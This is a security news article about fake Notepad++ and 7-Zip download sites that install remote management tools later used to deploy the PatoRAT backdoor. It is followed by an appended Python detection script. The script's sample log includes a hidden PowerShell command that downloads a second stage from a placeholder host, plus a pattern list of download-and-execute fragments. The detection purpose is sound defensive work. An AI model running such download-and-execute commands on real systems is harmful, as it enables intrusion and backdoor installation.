Threat Actors Using Fake Notepad++ and 7-zip Websites to Deploy Remote Monitoring Tools

David kimber
January 27, 2026

Threat actors are increasingly leveraging deceptive websites, mimicking popular software download pages, to distribute malicious Remote Monitoring and Management (RMM) tools.

These deceptive sites impersonate legitimate utilities like Notepad++ and 7-Zip, tricking users into installing remote access tools such as LogMeIn Resolve instead of the software they intended to download.

Once installed, these RMM tools allow attackers to seize full control of infected systems, execute commands remotely, and deploy additional malware payloads like PatoRAT.

The attack begins when users land on fraudulent download pages, often through advertisements or search engine manipulation.

These websites closely replicate the appearance and layout of official software distribution sites, making detection difficult for average users.

When visitors attempt to download Notepad++ or 7-Zip, the fake sites deliver LogMeIn Resolve or PDQ Connect—legitimate remote management tools that attackers repurpose for malicious objectives.

These tools register with their respective infrastructures upon installation, establishing a persistent connection that threat actors exploit to maintain access.

ASEC analysts identified a significant increase in attacks leveraging RMM tools during the initial infection phase.

Unlike traditional malware, these legitimate remote control applications often evade detection by antivirus software, presenting a serious challenge for security teams.

Camouflage utility download page (Source - ASEC)

The researchers documented cases where attackers deployed both LogMeIn Resolve and PDQ Connect to execute PowerShell commands and install backdoor malware, creating multiple pathways for system compromise and data theft.

Infection Mechanism and Remote Access Deployment

The infection process relies on social engineering tactics that exploit user trust in familiar software brands. Fake websites display convincing download buttons, version numbers, and installation options that mirror legitimate pages.

When users execute the downloaded installer, they unknowingly install LogMeIn Resolve or PDQ Connect instead of the expected utility.

These RMM tools offer features such as remote support, patch management, and system monitoring—capabilities designed for IT administrators but weaponized by attackers for unauthorized access.

After installation completes, the RMM tools register with their cloud-based management infrastructure, enabling attackers to connect remotely without additional authentication.

The threat actors then execute PowerShell commands through the RMM interface to download and install PatoRAT, a backdoor that provides persistent access even if the RMM tool is later removed.

This multi-stage approach ensures continued control over compromised systems and allows attackers to deploy ransomware, steal credentials, or establish footholds in corporate networks.

Malware installation log using PDQ Connect (Source - ASEC)

Users should only download software from official websites and verify digital signatures and certificates before installation.

Organizations should implement endpoint detection and response solutions capable of monitoring RMM tool activity and identifying suspicious remote access patterns that indicate potential compromise.
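One way to express the recommended detection in code, as an added example that is not part of the article or ASEC's research: flag process-creation events where an RMM agent is the parent of a PowerShell process whose command line fetches or decodes further content, which is the PatoRAT staging pattern described above. The log format and the RMM parent-process image names are constructed placeholders, not verified binary names.

```python
import re
from typing import Iterable

# Assumed image names for the RMM agents named in the article. These are
# placeholders for illustration; map them to the real agent binaries in use.
RMM_PARENTS = {"rmm_logmein_resolve_agent.exe", "rmm_pdq_connect_agent.exe"}

# PowerShell fragments typically used to pull down or decode a second stage.
DOWNLOAD_PATTERNS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer|"
    r"Invoke-Expression|\biex\b|-enc(odedcommand)?\b)",
    re.IGNORECASE,
)


def parse_event(line: str) -> dict:
    """Parse one 'Key=Value|Key=Value' process-creation record (constructed format)."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))


def is_rmm_spawned_download(event: dict) -> bool:
    """True when an RMM agent parents a PowerShell process that fetches/decodes code."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    child = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    return (
        parent in RMM_PARENTS
        and child in {"powershell.exe", "pwsh.exe"}
        and DOWNLOAD_PATTERNS.search(event.get("CommandLine", "")) is not None
    )


def find_suspicious(lines: Iterable[str]) -> list:
    """Return the ProcessId of every event that matches the detection."""
    events = [parse_event(line) for line in lines]
    return [e["ProcessId"] for e in events if is_rmm_spawned_download(e)]


# Constructed sample events: one RMM-parented download, one benign PowerShell,
# one RMM-parented cmd.exe (not matched), one RMM-parented encoded command.
SAMPLE_LOG = [
    r"ParentImage=C:\Program Files\RMM\rmm_pdq_connect_agent.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ProcessId=4120|CommandLine=powershell.exe -nop -w hidden -c Invoke-WebRequest http://example.invalid/stage2 -OutFile C:\Users\Public\upd.exe",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ProcessId=5011|CommandLine=powershell.exe Get-Process",
    r"ParentImage=C:\Program Files\RMM\rmm_logmein_resolve_agent.exe|Image=C:\Windows\System32\cmd.exe|ProcessId=6022|CommandLine=cmd.exe /c whoami",
    r"ParentImage=C:\Program Files\RMM\rmm_logmein_resolve_agent.exe|Image=C:\Program Files\PowerShell\7\pwsh.exe|ProcessId=7033|CommandLine=pwsh.exe -EncodedCommand QQBCAEMA",
]

if __name__ == "__main__":
    print("suspicious process ids:", find_suspicious(SAMPLE_LOG))
```

Treat a match as a triage signal rather than proof of compromise: administrators do legitimately run PowerShell through RMM consoles, so the hit should be corroborated by whether the RMM agent itself was approved and where the installer came from.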
